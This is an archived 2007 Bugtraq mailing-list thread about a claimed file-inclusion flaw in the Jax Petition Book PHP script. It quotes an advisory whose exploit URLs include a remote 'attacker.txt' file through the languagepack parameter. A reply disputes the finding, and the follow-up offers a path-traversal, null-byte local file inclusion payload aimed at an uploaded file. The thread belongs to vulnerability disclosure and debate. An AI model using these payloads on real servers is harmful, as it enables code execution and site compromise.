lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <45AD1EB3.90503@greeneandassoc.com>
Date: Tue, 16 Jan 2007 11:51:31 -0700
From: John McGuire <bugtraq@...eneandassoc.com>
To: bmatheny@...ocracy.net
Cc: bugtraq@...urityfocus.com
Subject: Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities

Actually, this can be pretty serious depending on server settings, but 
an improper example was given.

Better one:

jax_petitionbook.php?languagepack=../../some_other_allowed_file_uploads/myfile.php.gif%00


Many servers will have magic quotes on to defeat the null byte, but by no means all.

John



bmatheny@...ocracy.net wrote:

>This is not a vulnerability. Since $languagepack is prefixed by "language/",
>the PHP stream handler will simply try to open a local file. Also, you can
>only modify $languagepack if register_globals is on, which, it rarely is
>these days.
>
>Can we stop with the PHP 'vulnerabilities' that aren't?
>
>-Blake
>
>Whatchu talkin' 'bout, Willis?
>  
>
>>------------------------------------------------------------------------------------------------------------------
>>
>>AYYILDIZ.ORG PreSents...
>>
>>
>>*Script: Jax Petition Book
>>*Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip
>>
>>*Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
>>
>>-------------------------------------------------------------------------------------------------------------------
>>
>>*Code:
>>
>>require ( "language/" .$languagepack . ".inc.php" );
>>
>>-------------------------------------------------------------------------------------------------------------------
>>
>>*Exploit: 
>>
>>jax_petitionbook.php?languagepack=http://attacker.txt?
>>smileys.php?languagepack=http://attacker.txt?
>>
>>-------------------------------------------------------------------------------------------------------------------
>>
>>Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
>>Special Tnx: AYYILDIZ.ORG
>>    
>>
>
>  
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ